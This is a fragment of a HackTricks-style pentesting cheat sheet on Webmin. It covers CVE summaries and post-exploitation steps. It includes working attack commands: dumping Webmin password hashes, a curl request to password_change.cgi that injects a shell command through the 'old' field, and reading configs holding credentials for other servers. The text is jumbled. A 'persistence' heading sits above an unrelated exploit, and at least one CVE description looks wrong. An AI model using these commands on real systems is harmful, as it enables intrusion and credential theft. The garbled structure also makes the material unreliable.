Hacktricks — Webmin
Works even without password expiry enabled – just need a valid session cookie.

4.2 CVE-2019-12840 (Webmin < 1.910)

Vulnerability: update.cgi RCE via 'u' parameter injection. Requires authenticated user.

4.3 CVE-2020-35606 (1.962)

Vulnerability: Arbitrary file disclosure in package-updates/update.cgi (CWE-22) – leads to root SSH key theft.

5. Post-Exploitation

Once you have root (Webmin runs as root by default):

5.1 Dump Webmin Users

    cat /etc/webmin/miniserv.users
    # Format: user:encrypted_pass

5.2 Modify Webmin to Persist

Add a new admin user:

    # Using metasploit
    use exploit/linux/http/webmin_package_updates_rce

    # Or manual:
    curl -k -X POST 'https://<target>:10000/password_change.cgi' \
      -H 'Referer: https://<target>:10000/session_login.cgi' \
      -H 'Content-Type: application/x-www-form-urlencoded' \
      --data 'user=root&pam=&expired=2&old=id&new1=test&new2=test'

Command output shown in error message.

    cat /etc/webmin/servers/*.conf
    # Contains IPs and credentials to other Webmin instances.

Detect Webmin service:

    ss -tlnp | grep 10000
    ps aux | grep miniserv
    cat /etc/webmin/servers/*

(if password expiry module enabled):